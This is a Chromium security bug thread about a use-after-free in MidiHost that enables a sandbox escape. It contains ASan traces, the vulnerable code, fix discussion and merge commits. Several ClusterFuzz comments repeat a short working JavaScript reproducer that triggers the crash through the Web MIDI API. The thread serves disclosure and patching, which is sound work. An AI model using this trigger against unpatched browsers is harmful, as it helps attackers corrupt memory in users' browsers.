Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 3 users
Status: Fixed
Owner:
Closed: Dec 2015
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux, Chrome, Mac
Pri: 0
Type: Bug-Security



Sign in to add a comment
Security: UAF in MidiHost (Sandbox escape)
Project Member Reported by och...@chromium.org, Dec 2 2015 Back to list
Renderer patch attached. Consistently repros on my machine, but there is a race that must be won.

In MidiManagerAlsa::DispatchSendMidiData (can be called from IPC), there is a 

  // Acknowledge send.
  send_thread_.message_loop()->PostTask(
      FROM_HERE, base::Bind(&MidiManagerClient::AccumulateMidiBytesSent,
                            base::Unretained(client), data.size()));

|client| is a MidiHost, which is both a MidiManagerClient and a BrowserMessageFilter for a particular renderer process. |send_thread_| is a thread that belongs to MidiManagerAlsa, which is owned by BrowserMainLoop, independent of any renderers. This means that it’s possible for |client| to be freed (it’s not retained) when the corresponding RenderProcessHostImpl dies while these tasks are still in the message loop.

If the race is won (i.e. the MidiHost gets freed before the task fires), we get a virtual call into MidiManagerClient::AccumulateMidiBytesSent on a freed |this|.

ASan report:

==7760==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110001f4040 at pc 0x7f96d4b66d0a bp 0x7f96957f6a60 sp 0x7f96957f6a58
READ of size 8 at 0x6110001f4040 thread T20 (Chrome_IOThread)
    #0 0x7f96d4b66d09 in Run base/bind_internal.h:178:12
    #1 0x7f96d4b66bb2 in MakeItSo base/bind_internal.h:295:5
    #2 0x7f96d4b6698c in Run base/bind_internal.h:345:12
    #3 0x7f96c9a26ec3 in Run base/callback.h:396:12
    #4 0x7f96c9a96c95 in RunTask base/debug/task_annotator.cc:51:3
    #5 0x7f96c9be9247 in RunTask base/message_loop/message_loop.cc:482:3
    #6 0x7f96c9bea459 in DeferOrRunPendingTask base/message_loop/message_loop.cc:491:5
    #7 0x7f96c9beb4c7 in DoWork base/message_loop/message_loop.cc:603:13
    #8 0x7f96c99e276b in Run base/message_loop/message_pump_libevent.cc:237:21
    #9 0x7f96c9be841e in RunHandler base/message_loop/message_loop.cc:446:3
    #10 0x7f96c9ce2d34 in Run base/run_loop.cc:55:3
    #11 0x7f96c9be3cbf in Run base/message_loop/message_loop.cc:289:3
    #12 0x7f96c9e39568 in Run base/threading/thread.cc:199:3
    #13 0x7f96d50992fa in IOThreadRun content/browser/browser_thread_impl.cc:211:3
    #14 0x7f96d50996c9 in Run content/browser/browser_thread_impl.cc:246:14
    #15 0x7f96c9e39e89 in ThreadMain base/threading/thread.cc:251:3
    #16 0x7f96c9dfd4ae in ThreadFunc base/threading/platform_thread_posix.cc:64:3
    #17 0x7f96c1fcd181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312:0

0x6110001f4040 is located 0 bytes inside of 256-byte region [0x6110001f4040,0x6110001f4140)
freed by thread T20 (Chrome_IOThread) here:
    #0 0x7f96e1bee77b in operator delete(void*) ??:?
    #1 0x7f96d5fe5ff1 in ~MidiHost content/browser/media/midi_host.cc:62:23
    #2 0x7f96d5fe619f in Destruct<content::MidiHost> content/public/browser/browser_thread.h:257:9
    #3 0x7f96d5fe6034 in OnDestruct content/browser/media/midi_host.cc:69:3
    #4 0x7f96d4b657ed in Destruct content/public/browser/browser_message_filter.h:135:5
    #5 0x7f96d4b6576b in Release base/memory/ref_counted.h:184:7
    #6 0x7f96d4b65728 in Release base/memory/ref_counted.h:403:3
    #7 0x7f96d4b65708 in ~scoped_refptr base/memory/ref_counted.h:298:7
    #8 0x7f96d4b66684 in ~MaybeScopedRefPtr base/bind_helpers.h:439:8
    #9 0x7f96d4b66668 in ~BindState base/bind_internal.h:414:17
    #10 0x7f96d4b665c6 in Destroy base/bind_internal.h:417:5
    #11 0x7f96c9a3c003 in Release base/callback_internal.cc:18:5
    #12 0x7f96c9a3c864 in Release base/memory/ref_counted.h:403:3
    #13 0x7f96c9a3c5e8 in ~scoped_refptr base/memory/ref_counted.h:298:7
    #14 0x7f96c9a3c574 in ~CallbackBase base/callback_internal.cc:43:1
    #15 0x7f96c9a15d24 in ~Callback base/callback_forward.h:11:7
    #16 0x7f96c9c6bb12 in ~PendingTask base/pending_task.cc:34:1
    #17 0x7f96c9beb505 in DoWork base/message_loop/message_loop.cc:606:5
    #18 0x7f96c99e276b in Run base/message_loop/message_pump_libevent.cc:237:21
    #19 0x7f96c9be841e in RunHandler base/message_loop/message_loop.cc:446:3
    #20 0x7f96c9ce2d34 in Run base/run_loop.cc:55:3
    #21 0x7f96c9be3cbf in Run base/message_loop/message_loop.cc:289:3
    #22 0x7f96c9e39568 in Run base/threading/thread.cc:199:3
    #23 0x7f96d50992fa in IOThreadRun content/browser/browser_thread_impl.cc:211:3
    #24 0x7f96d50996c9 in Run content/browser/browser_thread_impl.cc:246:14
    #25 0x7f96c9e39e89 in ThreadMain base/threading/thread.cc:251:3
    #26 0x7f96c9dfd4ae in ThreadFunc base/threading/platform_thread_posix.cc:64:3
    #27 0x7f96c1fcd181 in start_thread /build/buildd/eglibc-2.19/nptl/pthread_create.c:312:0

previously allocated by thread T0 (chrome) here:
    #0 0x7f96e1bee1bb in operator new(unsigned long) ??:?
    #1 0x7f96d64c566d in CreateMessageFilters content/browser/renderer_host/render_process_host_impl.cc:876:7
    #2 0x7f96d64c2be9 in Init content/browser/renderer_host/render_process_host_impl.cc:699:3
    #3 0x7f96d586282b in CreatePendingRenderFrameHost content/browser/frame_host/render_frame_host_manager.cc:1641:8
    #4 0x7f96d584db12 in UpdateStateForNavigate content/browser/frame_host/render_frame_host_manager.cc:2393:5
    #5 0x7f96d584c264 in Navigate content/browser/frame_host/render_frame_host_manager.cc:388:49
    #6 0x7f96d57ac4b5 in NavigateToEntry content/browser/frame_host/navigator_impl.cc:314:7
    #7 0x7f96d57aeac0 in NavigateToPendingEntry content/browser/frame_host/navigator_impl.cc:391:10
    #8 0x7f96d57415c9 in NavigateToPendingEntryInternal content/browser/frame_host/navigation_controller_impl.cc:1796:12
    #9 0x7f96d5728911 in NavigateToPendingEntry content/browser/frame_host/navigation_controller_impl.cc:1773:18
    #10 0x7f96d5729439 in LoadEntry content/browser/frame_host/navigation_controller_impl.cc:441:3
    #11 0x7f96d572f0cf in LoadURLWithParams content/browser/frame_host/navigation_controller_impl.cc:806:3
    #12 0x7f96e54d98ef in LoadURLInContents chrome/browser/ui/browser_navigator.cc:290:3
    #13 0x7f96e54d4760 in Navigate chrome/browser/ui/browser_navigator.cc:547:9
    #14 0x7f96e5591fd4 in OpenTabsInBrowser chrome/browser/ui/startup/startup_browser_creator_impl.cc:774:5
    #15 0x7f96e558d0bb in ProcessSpecifiedURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:693:22
    #16 0x7f96e558b411 in ProcessStartupURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:629:22
    #17 0x7f96e55887ef in ProcessLaunchURLs chrome/browser/ui/startup/startup_browser_creator_impl.cc:515:26
    #18 0x7f96e5586bfb in Launch chrome/browser/ui/startup/startup_browser_creator_impl.cc:348:5
    #19 0x7f96e55763ac in LaunchBrowser chrome/browser/ui/startup/startup_browser_creator.cc:383:27
    #20 0x7f96e557581c in ProcessCmdLineImpl chrome/browser/ui/startup/startup_browser_creator.cc:833:12
    #21 0x7f96e5571820 in Start chrome/browser/ui/startup/startup_browser_creator.cc:327:10
    #22 0x7f96e30233b0 in PreMainMessageLoopRunImpl chrome/browser/chrome_browser_main.cc:1694:24
    #23 0x7f96e301f9fe in PreMainMessageLoopRun chrome/browser/chrome_browser_main.cc:1122:18
    #24 0x7f96d504297c in PreMainMessageLoopRun content/browser/browser_main_loop.cc:943:5
    #25 0x7f96d5051fba in Run base/bind_internal.h:178:12
    #26 0x7f96d5051cce in MakeItSo base/bind_internal.h:288:12
    #27 0x7f96d5051a99 in Run base/bind_internal.h:345:12
    #28 0x7f96d6037cb3 in Run base/callback.h:396:12
    #29 0x7f96d6bc0585 in RunAllTasksNow content/browser/startup_task_runner.cc:45:14

Thread T20 (Chrome_IOThread) created by T0 (chrome) here:
    #0 0x7f96e1bae1d9 in __interceptor_pthread_create ??:?
    #1 0x7f96c9dfc5f5 in CreateThread base/threading/platform_thread_posix.cc:103:13
    #2 0x7f96c9dfc1e2 in CreateWithPriority base/threading/platform_thread_posix.cc:184:10
    #3 0x7f96c9e388f4 in StartWithOptions base/threading/thread.cc:113:10
    #4 0x7f96d509a0d8 in StartWithOptions content/browser/browser_thread_impl.cc:301:10
    #5 0x7f96d503f0f6 in CreateThreads content/browser/browser_main_loop.cc:912:12
    #6 0x7f96d5051fba in Run base/bind_internal.h:178:12
    #7 0x7f96d5051cce in MakeItSo base/bind_internal.h:288:12
    #8 0x7f96d5051a99 in Run base/bind_internal.h:345:12
    #9 0x7f96d6037cb3 in Run base/callback.h:396:12
    #10 0x7f96d6bc0585 in RunAllTasksNow content/browser/startup_task_runner.cc:45:14
    #11 0x7f96d503d335 in CreateStartupTasks content/browser/browser_main_loop.cc:821:3
    #12 0x7f96d5057eeb in Initialize content/browser/browser_main_runner.cc:220:5
    #13 0x7f96d5032faa in BrowserMain content/browser/browser_main.cc:40:19
    #14 0x7f96d4b4a28b in RunNamedProcessTypeMain content/app/content_main_runner.cc:378:14
    #15 0x7f96d4b4ebae in Run content/app/content_main_runner.cc:786:12
    #16 0x7f96d4b47677 in ContentMain content/app/content_main.cc:19:15
    #17 0x7f96e1bf0330 in ChromeMain chrome/app/chrome_main.cc:66:12
    #18 0x7f96e1bf0121 in main chrome/app/chrome_exe_main_aura.cc:17:10
    #19 0x7f96bda9aec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287:0

SUMMARY: AddressSanitizer: heap-use-after-free (/mnt/ssd/chromium/src/out/Release/lib/libcontent.so+0xc31d09)
Shadow bytes around the buggy address:
  0x0c22800367b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c22800367c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800367d0: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c22800367e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c22800367f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c2280036800: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x0c2280036810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280036820: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c2280036830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2280036840: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c2280036850: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7760==ABORTING
 
renderer.patch
1.2 KB Download
Cc: project-zero@google.com
I'm assuming this can be reached in ChromeOS as well, please correct me if I'm wrong.

Note that in MidiHost::OnSendData, there is this check:

    if (output_port_count_ <= port) {
      bad_message::ReceivedBadMessage(this, bad_message::MH_INVALID_MIDI_PORT);
      return;
    }

On my Linux (corp) workstation however, output_port_count_ appears to be 1 by default.
Labels: -OS-Chrome
Remove OS-Chrome so that sheriffbot is able to work on the bug.
Taking another look, it looks like there are other platform specific implementations that may be vulnerable. In particular, the Mac implementation:

https://code.google.com/p/chromium/codesearch#chromium/src/media/midi/midi_manager_mac.cc

void MidiManagerMac::DispatchSendMidiData(MidiManagerClient* client,
                                          uint32 port_index,
                                          const std::vector<uint8>& data,
                                          double timestamp) {
  RunOnClientThread(
      base::Bind(&MidiManagerMac::SendMidiData,
                 base::Unretained(this), client, port_index, data, timestamp));
}

and...

void MidiManagerMac::SendMidiData(MidiManagerClient* client,
                                  uint32 port_index,
                                  const std::vector<uint8>& data,
                                  double timestamp) {
  ...
  ...
  client->AccumulateMidiBytesSent(data.size());
}

The Usb/Android implementations go through MidiScheduler::InvokeClosure and MidiManager::AccumulateMidiBytesSent, which checks for the existence of |client| in |MidiManager::clients_| before calling |AccumulateMidiBytesSent|, so they look safe to me:

void MidiManager::AccumulateMidiBytesSent(MidiManagerClient* client, size_t n) {
  {
    base::AutoLock auto_lock(lock_);
    if (clients_.find(client) == clients_.end())
      return;
  }
  client->AccumulateMidiBytesSent(n);
}

The Win implementation doesn't call client->AccumulateMidiBytesSent on a different thread, so looks safe too.
Labels: Pri-1 Security_Impact-Stable Security_Severity-High M-48
Owner: agoode@chromium.org
Status: Assigned
Labels: Cr-Internals-Media
Cc: toyoshim@chromium.org
toyoshim did the original implementation of this (and the Mac version). I rewrote most of it, but I think kept the original thread behavior.
Yes, this is the code used by Linux and Chrome OS.
Hum... Let me see the mac port.
Adam, can you have a time to look ALSA port?
I will look at ALSA, but can't do it this week. Monday for sure.
It appears that this might actually be a critical severity bug instead. I've managed to hit this same bug without a compromised renderer (simply by calling JS apis). Seeing if I can come up with a reliable repro...
Labels: -Pri-1 -Security_Severity-High Pri-0 Security_Severity-Critical
Here's a (JS) repro that consistently gives the same UAF report on my ASan build. Raising severity to critical.

agoode, toyoshim, could you please make this a priority?
haq.html
610 bytes View Download
Note that the above repro relies on haq.html being opened directly (e.g. from a <a target="_blank" href="haq.html"). Otherwise self.close() will not work.
Project Member Comment 14 by clusterf...@chromium.org, Dec 4 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000e4b40
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95DRFjFZrvbDxp-R1h2yZOpNnKyYZ4ZTPR5Et8zhuqTzP59HkH-j8RF1PrERgb94zeFoU2OJN3VDG_bIGDy1qiU7xwsNQf2Q-XFAY5UvjBvp3cyzf-0YoaIrLv_WtPDWbZWxio5dJQfxm1p4d_qvHJKgHW-mg


Filer: ochang

See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Project Member Comment 15 by clusterf...@chromium.org, Dec 4 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000f1740
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=320471:320682

Minimized Testcase (0.36 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972d8_JS3OZdxFrTxxBHt10xsbZLMoZI1cAdFyOmO-c1X_9qATcjlF4MoxD49VGOm2eQ6DgRRcwB1pEk7rSg6--VVPiPcPQRObcThE3dFXp3HqB1sPposEQbqOeCR16aQmnz2LBJx51RIhSmVC28t22V1QPXg
<script>
navigator.requestMIDIAccess().then(onMIDISuccess);
function onMIDISuccess(midi) {
  outputs = midi.outputs;
  var size = 10 * 1024 * 1024;
  var hello = new Uint8Array(size);
  for (var i = 0; i < size; i++) {
    hello[i] = 0xf8;
  }
  outputs.forEach(function(port) {
    port.send(hello);
    self.close();
  });
}
function onMIDIFailure() {
}
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Yes, I will have time to examine tonight.
Status: Started
I have a fix that calls MidiManager::AccumulateMidiBytesSent instead of MidiClient::AccumulateMidiBytesSent:

  // Acknowledge send.
  send_thread_.message_loop()->PostTask(
      FROM_HERE, base::Bind(&MidiManagerAlsa::AccumulateMidiBytesSent,
                            base::Unretained(this), base::Unretained(client),
                            data.size()));


But I wonder if that is sufficient:

void MidiManager::AccumulateMidiBytesSent(MidiManagerClient* client, size_t n) {
  {
    base::AutoLock auto_lock(lock_);
    if (clients_.find(client) == clients_.end())
      return;
  }
  client->AccumulateMidiBytesSent(n);
}

Why is the lock released before the client is used? I think we still have a race because the destruction occurs on the IO thread:

void MidiManager::EndSession(MidiManagerClient* client) {
  ReportUsage(Usage::SESSION_ENDED);

  // At this point, |client| can be in the destruction process, and calling
  // any method of |client| is dangerous.
  base::AutoLock auto_lock(lock_);
  clients_.erase(client);
  pending_clients_.erase(client);
}

MidiHost::~MidiHost() {
  // Close an open session, or abort opening a session.
  if (is_session_requested_ && midi_manager_)
    midi_manager_->EndSession(this);
}

void MidiHost::OnDestruct() const {
  BrowserThread::DeleteOnIOThread::Destruct(this);
}

Thanks for working on this! Let's discuss this on the CL.
Project Member Comment 20 by bugdroid1@chromium.org, Dec 7 2015
Should we plan on merging back to stable?
Let's get the Mac fix checked in first too (submitted a patch), and then do both merges?
Project Member Comment 23 by bugdroid1@chromium.org, Dec 8 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4

commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4
Author: ochang <ochang@chromium.org>
Date: Tue Dec 08 02:36:08 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}

[modify] http://crrev.com/54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4/media/midi/midi_manager_mac.cc

Project Member Comment 24 by clusterf...@chromium.org, Dec 8 2015
ClusterFuzz has detected this issue as fixed in range 363393:363449.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000f1740
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=320471:320682
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=363393:363449

Minimized Testcase (0.36 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972d8_JS3OZdxFrTxxBHt10xsbZLMoZI1cAdFyOmO-c1X_9qATcjlF4MoxD49VGOm2eQ6DgRRcwB1pEk7rSg6--VVPiPcPQRObcThE3dFXp3HqB1sPposEQbqOeCR16aQmnz2LBJx51RIhSmVC28t22V1QPXg
<script>
navigator.requestMIDIAccess().then(onMIDISuccess);
function onMIDISuccess(midi) {
  outputs = midi.outputs;
  var size = 10 * 1024 * 1024;
  var hello = new Uint8Array(size);
  for (var i = 0; i < size; i++) {
    hello[i] = 0xf8;
  }
  outputs.forEach(function(port) {
    port.send(hello);
    self.close();
  });
}
function onMIDIFailure() {
}
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect,try re-doing that job on the test case report page.
Project Member Comment 25 by bugdroid1@chromium.org, Dec 8 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/5e766f50703e98ea6c25ea630993047f3deed31d

commit 5e766f50703e98ea6c25ea630993047f3deed31d
Author: agoode <agoode@chromium.org>
Date: Tue Dec 08 03:45:54 2015

Add comment about lock_ in MidiManager::AccumulateMidiBytesSent

BUG= 564501 

Review URL: https://codereview.chromium.org/1503213002

Cr-Commit-Position: refs/heads/master@{#363721}

[modify] http://crrev.com/5e766f50703e98ea6c25ea630993047f3deed31d/media/midi/midi_manager.cc

Project Member Comment 26 by clusterf...@chromium.org, Dec 8 2015
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5585295212281856

Uploader: ochang@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x6120000f1740
Crash State:
  base::internal::Invoker<base::IndexSequence<0ul, 1ul>, base::internal::BindState
  base::debug::TaskAnnotator::RunTask
  base::MessageLoop::RunTask
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=320471:320682
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=363393:363449

Minimized Testcase (0.36 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv972d8_JS3OZdxFrTxxBHt10xsbZLMoZI1cAdFyOmO-c1X_9qATcjlF4MoxD49VGOm2eQ6DgRRcwB1pEk7rSg6--VVPiPcPQRObcThE3dFXp3HqB1sPposEQbqOeCR16aQmnz2LBJx51RIhSmVC28t22V1QPXg
<script>
navigator.requestMIDIAccess().then(onMIDISuccess);
function onMIDISuccess(midi) {
  outputs = midi.outputs;
  var size = 10 * 1024 * 1024;
  var hello = new Uint8Array(size);
  for (var i = 0; i < size; i++) {
    hello[i] = 0xf8;
  }
  outputs.forEach(function(port) {
    port.send(hello);
    self.close();
  });
}
function onMIDIFailure() {
}
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Labels: Merge-Request-47 Merge-Request-48
Status: Fixed
Requesting merges for 47 and 48.
Project Member Comment 28 by clusterf...@chromium.org, Dec 8 2015
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Comment 29 by tin...@google.com, Dec 9 2015
Labels: -Merge-Request-48 Merge-Approved-48
Merge approved for M48 (branch 2564). Pls merge in.
Project Member Comment 30 by bugdroid1@chromium.org, Dec 9 2015
Labels: -Merge-Approved-48 merge-merged-2564
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/f707b29a60ea179f604d0a39287e12a2930579e3

commit f707b29a60ea179f604d0a39287e12a2930579e3
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:18:19 2015

Fix crash with MIDI send for MidiManagerAlsa

BUG= 564501 

Review URL: https://codereview.chromium.org/1500153002

Cr-Commit-Position: refs/heads/master@{#363413}
(cherry picked from commit a3d22f60a719a6dae77a0586ef32dd12ac463952)

Review URL: https://codereview.chromium.org/1509313002 .

Cr-Commit-Position: refs/branch-heads/2564@{#277}
Cr-Branched-From: 1283eca15bd9f772387f75241576cde7bdec7f54-refs/heads/master@{#359700}

[modify] http://crrev.com/f707b29a60ea179f604d0a39287e12a2930579e3/media/midi/midi_manager.cc
[modify] http://crrev.com/f707b29a60ea179f604d0a39287e12a2930579e3/media/midi/midi_manager_alsa.cc

Project Member Comment 31 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/255563d75cf0d2cade139168bc77b706a19d2674

commit 255563d75cf0d2cade139168bc77b706a19d2674
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:21:22 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}
(cherry picked from commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4)

Review URL: https://codereview.chromium.org/1509953003 .

Cr-Commit-Position: refs/branch-heads/2564@{#278}
Cr-Branched-From: 1283eca15bd9f772387f75241576cde7bdec7f54-refs/heads/master@{#359700}

[modify] http://crrev.com/255563d75cf0d2cade139168bc77b706a19d2674/media/midi/midi_manager_mac.cc

I opened issue #567920 for implementing a MIDI sandbox.
Project Member Comment 33 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chrome-internal.googlesource.com/bling/chromium.git/+/f707b29a60ea179f604d0a39287e12a2930579e3

commit f707b29a60ea179f604d0a39287e12a2930579e3
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:18:19 2015

Project Member Comment 34 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chrome-internal.googlesource.com/bling/chromium.git/+/255563d75cf0d2cade139168bc77b706a19d2674

commit 255563d75cf0d2cade139168bc77b706a19d2674
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 00:21:22 2015

Comment 35 by tin...@google.com, Dec 9 2015
The fix is in 48.0.2564.41, pls verify as appropriate.
Labels: -Merge-Request-47 Merge-Approved-47
Merge approved for M47 (branch 2526)
Project Member Comment 37 by bugdroid1@chromium.org, Dec 9 2015
Labels: -Merge-Approved-47 merge-merged-2526
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/6527ea243e8684bad59cceee16389b219ec03c52

commit 6527ea243e8684bad59cceee16389b219ec03c52
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 18:43:30 2015

Fix crash with MIDI send for MidiManagerAlsa

BUG= 564501 

Review URL: https://codereview.chromium.org/1500153002

Cr-Commit-Position: refs/heads/master@{#363413}
(cherry picked from commit a3d22f60a719a6dae77a0586ef32dd12ac463952)

Review URL: https://codereview.chromium.org/1510313002 .

Cr-Commit-Position: refs/branch-heads/2526@{#518}
Cr-Branched-From: cb947c0153db0ec02a8abbcb3ca086d88bf6006f-refs/heads/master@{#352221}

[modify] http://crrev.com/6527ea243e8684bad59cceee16389b219ec03c52/media/midi/midi_manager.cc
[modify] http://crrev.com/6527ea243e8684bad59cceee16389b219ec03c52/media/midi/midi_manager_alsa.cc

Project Member Comment 38 by bugdroid1@chromium.org, Dec 9 2015
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/7a3785cab4bc23accf2a7d7e0394c7d388903eb1

commit 7a3785cab4bc23accf2a7d7e0394c7d388903eb1
Author: Oliver Chang <ochang@chromium.org>
Date: Wed Dec 09 18:48:11 2015

Fix a potential crash in MidiManagerMac.

R=toyoshim@chromium.org,agoode@chromium.org
BUG= 564501 

Review URL: https://codereview.chromium.org/1508563003

Cr-Commit-Position: refs/heads/master@{#363714}
(cherry picked from commit 54d256d1fc9c6a9e7438f6f51206d1f99b1ed6b4)

Review URL: https://codereview.chromium.org/1515673002 .

Cr-Commit-Position: refs/branch-heads/2526@{#519}
Cr-Branched-From: cb947c0153db0ec02a8abbcb3ca086d88bf6006f-refs/heads/master@{#352221}

[modify] http://crrev.com/7a3785cab4bc23accf2a7d7e0394c7d388903eb1/media/midi/midi_manager_mac.cc

Cc: infe...@chromium.org
Labels: OS-Chrome OS-Mac
Labels: Release-2-M47
Cc: palmer@chromium.org
Project Member Comment 42 by sheriffbot@chromium.org, Mar 15 2016
Labels: -Restrict-View-SecurityNotify
This security bug has been closed for more than 14 weeks. Removing view restrictions.

For more details visit https://sites.google.com/a/chromium.org/dev/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 43 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 44 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment